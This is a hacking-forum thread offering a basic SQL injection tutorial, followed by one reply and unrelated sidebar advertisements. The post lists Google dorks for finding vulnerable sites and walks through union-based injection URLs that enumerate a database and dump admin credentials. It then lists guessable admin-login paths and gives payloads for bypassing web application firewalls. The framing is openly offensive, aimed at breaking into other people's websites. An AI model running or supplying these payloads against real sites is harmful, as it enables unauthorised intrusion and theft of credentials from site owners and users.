Jump to content
MaxCheaters Official Group on Discord
Top.MaxCheaters.com is now OPEN – Lineage 2 Top Listing

Tutorial Full Basic SQL Injection

MrHotFire

By MrHotFire
in Hacking Tutorials & Guides

 Share

Recommended Posts

MrHotFire Newbie

MrHotFire

Posted
Posted

What Is an SQL Injection?

 

An SQL Injection, is basically a code injection that exploits the area vulnerable to SQL Injection. The injected code will be exploiting the Database, to get Information. Such as Emails, Usernames, Passwords, etc.

In this Tutorial, we'll be looking for the Admin Panel's credentials. Keep in mind, I said Admin Panel, not control panel. While performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information, so that it will not be compromised so easily.

 

Finding a Vulnerable Site

 

You can find a vulnerable site using Dorks. Use google, it's the best way. A dork is something like this:

inurl:news.php?id=
inurl:event.php?id=
inurl:order.php?id=
inurl:user.php?id=
inurl:restaurant.php?id=
inurl:buy.php?id=

 

There are Hundreds of Thousands of others, and there are also some Posts about Dorks, so you could read those if you want to find a good site to exploit with SQL Injection.

 

Exploiting the Database

 

Alright? Are you all ready for the fun of an SQL Injection? Okay, so first, we need to test our site to see if it's vulnerable to SQL Injection. I will use a random site name for my Example:

http://www.hopefullyvulnerablesite.com/event.php?id=1

 

Our site HAS to have an '=' in it. Otherwise we cannot use SQL Injection to exploit the Database. So after the 1 (In the ID) put a ' so that it looks like this:

http://www.hopefullyvulnerablesite.com/event.php?id=1'

 

Now if we get a MySQL error, then our site is probably vulnerable. If it just refreshes the page normally, then our site is not vulnerable.

 

Finding the number of columns

 

Now, we know our site is vulnerable to SQL Injection, so we want to start getting the Info out of the Database. But before we do that, we have to find out WHICH columns are vulnerable to SQL Injection. But we don't know how many columns there are yet, so we need that first. To find the number of columns we need to use a command called 'Order By'. This command will help us determine how many columns there are. So your URL should now look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 2--

 

Now if the site just refreshed to it's normal state, that's good. So we didn't get an error, so we have to continue until we get an error.

 

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--

*NO ERROR*

 

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--

*NO ERROR*

 

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--

*ERROR*

 

Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error.

 

 

Tip:The two hyphen's (--) are critical for executing the command. The two hyphens will tell the site that it's a command, and will execute. So we NEED those at the end of every command.

 

Finding the vulnerable column

 

We now have the number of columns. But we just need to find out which one(s) are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--

 

A couple of number will appear on your screen. That is normal, and is a good sign. Those numbers, are the numbers of columns that are vulnerable to SQL Injection. So those are the columns we need to execute our commands in. So lets say that column 2 appeared on the Page. We will be executing commands in column 2.

 

 

Tip:You HAVE to have the - after the =. That is critical.

 

Determining the Version of the MySQL Database

 

Why do we need the version you ask? Because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5.

 

So our vulnerable column is 2. So that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--

 

Now it should display the Version on the page. It should look something like this:

5.1.47-community-log

 

The numbers don't matter, as long as they're at least 5, or over.

 

Finding the name of the Database

 

The name of the Database is important. At least if we want to look in the Tables which will contain the information. To find the name of the database, there are 2 most common ways. They both will work. The first command is: 

http://hopefullyvulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--

 

Sometimes, that command will show you more than the Database name. But all we want is the database name, so the better command would prefferably be:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--

 

Now you will be showed the Database name. Congrats, look how far we are already. Now to the good stuff!

 

Viewing the Tables in the Database

 

The tables are what contains information. That's why we need to view them. So we can get the information we seek.

 

The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

 

Hit enter, and the Tables in the Database will be displayed. :happyforever:

 

Viewing the Tables' information

 

We will most likely be given many tables. It is up to you to decide which one contains the valuable information.

 

So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password, is what we REALLY need. So choose a table. The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"

 

For that query, you will almost ALWAYS get an error. So instead, convert the 'admin_credentials' to Hex.

 

 

Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73

 

You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will NOT work.

Displaying the Contents

 

There will still be some tables inside the table you've chosen. So you need to get the information, and that will usually mean goodbye tables, and HELLO Admin Panel access.

 

Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--

 

That will display the information. Where it says DBName, you need to put the name of the Database you got earlier in this tutorial. An where it says admin_credentials, you need to put the table that you are inside of.

 

Now we should have all the credentials, so we just need to find the Admin Login.

Finding the AdminLogin

 

Usually, all you'll have to do is take a quick look by adding a small /admin or /index.php/admin.

 

Like this:

http://www.hopefullyvulnerablesite.com/admin
http://www.hopefullyvulnerablesite.com/admin.php
http://www.hopefullyvulnerablesite.com/login.php
http://www.hopefullyvulnerablesite.com/admin/index.php
http://www.hopefullyvulnerablesite.com/login/index.php
http://www.hopefullyvulnerablesite.com/adminlogin
http://www.hopefullyvulnerablesite.com/adminlogin.php
http://www.hopefullyvulnerablesite.com/adminlogin/index.php
http://www.hopefullyvulnerablesite.com/moderator.php
http://www.hopefullyvulnerablesite.com/moderator
http://www.hopefullyvulnerablesite.com/modlogin

 

And there are plenty more. At times, you will not find the Login, so you'll need an "Admin Login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it brings a more proud-ness after hacking the Website.

 

WAF By-Passing

 

You may be asking, what is WAF By-Passing? First off, I'll be explaining what WAF is.

 

WAF stands for Web Application Firewall. A Web Application Firewall is put in place, so that their website will be secure from attacks such as SQL Injection, XSS, and more exploitation methods. The WAF filters commands put through to the Database, and detects attakcs against the site.

 

A WAF Error will look like this:

FORBIDDEN

You are not allowed to access "" on this server
*INFORMATION ABOUT THE WEBSERVER IS HERE*

 

If we get that error when we're using Union Select, that means that there is a WAF set in the webserver. So, in-order to by-pass it, we'll have to change our Syntax of the command, so that the filter doesn't detect an attack.

 

There are several methods on how to by-pass the WAF, I will be explaining a few:

 

1.

You don't have to worry about getting the number of columns, the Firewalls don't block that, however, the DO block the union select command, so here is method 1, on how to By-Pass the Firewall.

 

The code we're going to be using will be using different "Symbols" to by-pass the filter. It looks like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--

 

That will by-pass the Firewall. However, we still have several steps. Because we still need the other information from the tables and columns.

 

Once that is done, we will be getting the information from the vulnerable columns, so here's what it should look like:

http://www.hopefullyvulnerablesite.com/event.phpid=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version()),3--

 

To make this tutorial a little shorter, we'll be grabbing more information with just one command. So let's try it like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user(),0x3a,database(),0x3a),3--

 

Now, it should be displaying the information we asked for IN ORDER. So it'll be showing the Version, then the Username, then the Database name.

 

Now we'll be getting the table names. So we will again, have to by-pass the WAF. This time, the command will look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(table_name),3 from /*!information_schema*/.tables where table_schema=database()--

 

Now, that will be displaying all the tables. Now that access the table's information, we're going to use this commdn to by-pass the firewall:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(column_name),3 from /*!information_schema*/.columns where table_name=0x*HEX CODE OF THE TABLE NAME*--

 

There we go, now we're looking at the information of the tables. Now we want to dump the columns, so here's what we'll use:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(*COLUMN NAME HERE*),3 from *DATABASE NAME HERE*.*TABLE NAME HERE*

 

And that's all for WAF By-Passing. Hopefully now, you're an SQL Injection expert :). If you need any more help, feel free to PM me, or even add a comment. I really hope this helped, good luck!

 

:happyforever: :happyforever: :happyforever: :happyforever: :troll: :troll: :troll: :troll: :troll: :troll: :troll:

 

  • 5 weeks later...
  • 2 weeks later...
bobnet84 Newbie

bobnet84

Posted
Posted

Doesn't seem to work, whenever I change the order by x--

page just refreshes, tried putting order by 5145555--

still just refresher, tried on numerous sites with 'id' in it

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing


  • Posts

    • Databay
      █ 7,000,000+ RESIDENTIAL PROXIES ✅ FROM 0.65$ / GB █

      By Databay · Posted

      This is a bump: https://databay.com/
    • Splicho
      NimeraCP: A Modern Web Control Panel for L2java

      By Splicho · Posted

      Introducing: Containers to Roll   Players now have the ability to win containers/cases via the Roll System. Additionally I also added a global leaderboard displaying the users with the most roll games. This can be disabled/enabled via Admin Management Panel. Also improved the winning display with a volumetric Godrays effect.  
    • VPSLab
      — VPSLAB — Fast & Private RDP/VPS | 100% Instant Setup

      By VPSLab · Posted

      Active & Taking orders!
    • negotiator
      I search job: posting your advertisement(sale,service).

      By negotiator · Posted

      I search job: posting your advertisement(sale,service) on various forums. Contacts for communication. You can find link for download messenger using Google search.   Telegram https://t.me/negotiato_r @negotiato_r   Element(based in United Kingdom) You can find me using this name. @negotiato-r:matrix.org   Session(based in Switzerland) You can find me using this name. 05770c2eda571fc8d10ec0e79e258ec0d9189def2a3e1f2ace1cd29a2174d40723   Delta Chat(based in Germany) You can find me using the link below. https://i.delta.chat/#1ABEBFFCBC1AEE629111387073FFDA1835BB423E&i=6WtJxcgJGcFD3vIpglQfhe5J&s=f2EkRsqxAeFYep9g9s1y1aIf&a=xuozjaudg%40nine.testrun.org&n=negotiator   I ask administrator or moderator not to consider this link an advertisement for messenger.  This is only link that people can use to contact me.  There is also QR code option,but you have to use mobile phone to access QR code.  This means you have to install VPN app on your mobile phone,then sync your account from your mobile phone to your laptop or computer.  This is a very cumbersome process.  It's much easier to use pre-made link for laptop or computer. Hello. I intermediary. I search job: posting your advertisement(sale,service) on various forums.  My service is free: posting your advertisement(sale,service) on various forums. I know these forum addresses,i can post your ad(for sale,service) on various forums. Dear sellers and those who provide any services. I offer you cooperation. My commission is not taken from your amount,my commission is added to your amount. From money received from guarantor,you pay me my commission.  Payment is made on Tether USDT TRC20 or on Tron TRX. Commission for sending from your wallet to my wallet paid by buyer. When communicating via messenger,please tell me what your commission is for sending on Tether USDT TRC20 or on Tron TRX.  Amount(fees) you'll pay as shipping fee to my wallet will be added to total amount. Payment will be made by guarantor to your payment details. Buyer deposits total amount with my percentage. Send me in messenger your ad copy with price(s). Independently from that through which messenger will be communication,buyer suggests using forum guarantor,gives forum address(http address) and send link(http address) to me,link i will pass on to you(seller) for consideration. If you as seller are not satisfied garant service on proposed forum,i say buyer goodbye and he goes to look for his product(service) from someone else,as result i will wait new buyer.   If sale amount is less than $1000,i receive 20 percent above your total amount. If sale amount is more than $1000,i receive 10 percent above your total amount. I do not deal with either buyers or sellers from Ukraine(i do not cooperate with this country). I will not accept any advertising related to Ukraine,as i do not cooperate with this country. For buyers from other countries guarantor's services are entirely at buyer's expense. You can offer me any other area cooperation that does not violate law.  I do not give 100% guarantee that i will accept your offer,which is not initially related to my advertising area.  It is 50/50 that i will either refuse you or accept your offer.  Everything will depend on whether this offer does not violate law.  I will read information about your product(service) in Google search engine that you offer me for advertising and make decision,which i will inform you in messenger for communication.  I will need some time to familiarize myself with information from Google search engine. I'm currently interested in 4 areas: 1)promotional offers with discounts only(coupons or promo codes):food,shoes,clothing,furniture,cosmetics,household appliances,consumer electronics,taxis,bus tickets,train tickets,plane tickets,hotel tickets,gas coupons or promo codes for car owners I do not advertise Ukraine,do not cooperate with it and have no dealings with it. I will not advertise anything related to carding.  Buyer deposits amount for product(service) plus my commission(20 percent based on amount for product or service) into guarantor and then receives their product(service) in forum transaction.  I would be grateful if it were possible for buyer to receive their goods somehow after depositing money with guarantor,without return address or contact information for future purchases. It's not in my best interests for buyer to communicate directly with you after first purchase. If this isn't possible,then you will simply agree with buyer to receive money with my percentage higher than your initial payment each time. If same customer purchases from you second time,customer pay you together with my percentage and i receive this percentage from you,this will provide additional incentive to advertise,i will promoting you on other forums.     2)selling real estate(houses or apartments) I'm not interested renting. I'm willing to advertise all countries except Russia and Ukraine.  I won't advertise these two countries. I don't advertise Ukraine,don't cooperate with it and have no dealings with it. I'm not interested house or apartment listings that appear on Google search pages,as buyer can find information there themselves without my help and buy house or apartment in desired country. I'm interested house or apartment that aren't listed on Google search. How i see this ad:buyer sees my listing for desired country and if they're interested,they deposit 10 percent listed price for house or apartment in Garant Service. Buyer sets  deadline in forum transaction,during which i either receive my money or don't.  Then buyer receive an address,day and time to meet with seller. Buyer takes lawyer and notary with them and flies(or is driving car) to  given address. If purchase transaction falls through,buyer collects their percentage from guarantor. I don't think buyer willing to buy  house or apartment worth more than 12545$ is willing to cheat me out  that 10 percent by making up  fake story about  failed deal.       3)selling telegram premium status Buyer has two options: 1) transaction through guarantor 2) transaction without guarantor   If transaction is through guarantor. I(intermediary) conduct transaction with guarantor. Buyer specifies following terms in terms transaction: 1) i authorize the disclosure of the transaction name to third parties(that is to you) 2) i authorize the disclosure of the seller's payment details(your payment details) to third parties(that is to you) 3) i authorize the disclosure of the total transaction amount to third parties(that is to you) 4) i do not authorize the disclosure of my profile link on this forum to third parties 5) i do not authorize the disclosure of my contact information(if i have any in my profile on this forum) to third parties   If activating premium status requires logging into buyer's account,i will do this.  You will provide me with instructions on how to activate premium status for buyer's account. If you want to contact me about selling premium status on telegram, but my telegram account is unavailable(account is frozen or telegram system has deleted it),you can contact me using my other contact information. To activate premium status by logging into buyer's account,i will download portable version telegram from official website and launch it on my laptop.  I will enter mobile phone number buyer provides me in messenger they originally contacted me through and send login code to this number.  Buyer will then send me login code. Once transaction is finalized and buyer has deposited funds into guarantor's account I'll notify you via messenger. You register on  forum suggested by buyer.  Message guarantor privately on forum,asking them to share all points I've outlined above.  Buyer will provide  link to guarantor's forum profile in advance or you can find guarantor's forum profile on forum yourself,it's up to you to decide. After verifying that your payment details are included and that transaction amount matches amount agreed upon in messenger, you upgrade buyer to premium status. Your payment details are specified in application,in formquestionnaire for forum transaction,but you won't receive money from guarantor until buyer will not receive service(product),as soon as buyer receives service from you,guarantor will pay you. If buyer has received premium status,you receive funds from guarantor and then pay me my commission using my payment details. The fee for sending from your wallet to my wallet is covered by buyer,not you. When communicating via messenger please tell me your fee for sending to Tether USDT TRC20 or Tron TRX. Buyer deposits funds into guarantor with total amount already including my percentage plus buyer's fee for sending,which you will spend by paying me my percentage when transferring from Tether USDT TRC20 or Tron TRX. If transaction is without guarantor. Buyer pays money to your payment details received from me via messenger and waits for service to be rendered. I will inform buyer total amount when communicating via messenger. You upgrade buyer to premium status through me and then you pay me my percentage to my payment details.  If activating premium status requires logging into buyer's account. I will do so.  You will provide me with instructions on how to activate premium status for buyer's account. Fee for sending from your wallet to my wallet is covered by buyer,not you.  When communicating via messenger please tell me your fee for sending to Tether(USDT TRC20) or Tron(TRX). Buyer pays you total amount,including my percentage plus buyer's fee for sending,which you will spend by paying me my percentage when transferring from Tether USDT TRC20 or Tron TRX.       4)i offer cooperation to specialists who provide services for collecting and submitting documents to consulate for citizenship,residence permits,visas and schengen visas I will advertise service collecting and sending documents to consulate only for following countries:Commonwealth of Independent States,Europe,Mexico,United states america,Canada,United Kingdom,Asia,Africa. Russia and Ukraine:these two countries i will not advertise. Buyer pays guarantor(amount from seller) for service for collecting and sending documents to consulate plus my commission(10 or 20 percent based on service fee). Buyer sets deadline in forum transaction within which they must receive service. Then in forum transaction buyer wait provision service. If after specified period(which will be specified in transaction),consulate refuses client's service,you as specialist have right to charge exact amount for your work through guarantor,since you spent your time on it(this clause will be specified in transaction). What will be amount you will decide,send solution through me.I'll let the buyer know. Client does not pay my percentage if consulate refuses client's service(this clause will be specified in transaction).  In case refusal to buyer from consulate you will need to confirm this refusal through website. Whenever you collect and submit documents on country's website,request is created through their website.  You will provide access to this request to guarantor.  This is necessary to ensure that buyer doesn't pay for nothing,meaning amount you will be required to receive through  guarantor for service provided if  consulate's request is unsuccessful.
    • orest1
      Introducing L2Soon.com

      By orest1 · Posted

      Hey MaxCheaters! 👋 Introducing L2Soon.com — a free international platform for Lineage 2 server announcements.   Why L2Soon? No more searching through dozens of forums and Discord servers. All new L2 server openings are in one place — updated daily, with real player online counts so you always know where people actually play.   Features: 🔔 Telegram Bot (@l2Soon_bot) — alerts 24h & 1h before server launch 📅 Accurate launch times — in your local timezone ⚔️ All chronicles — Interlude, High Five, GoD, Classic, Essence, Grand Crusade and more 🎯 Filters — by chronicle, rates (x1–x1000+) and server type (PvP, RvR, GvE, Craft, Low Rate...) ⭐ VIP servers — verified projects pinned at the top 🌍 Multi-language — EN, UK, RU, PT   Listing is completely FREE. 🔗 https://l2soon.com/en Feedback welcome — drop a comment or contact us via Telegram @l2Soon_bot

  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..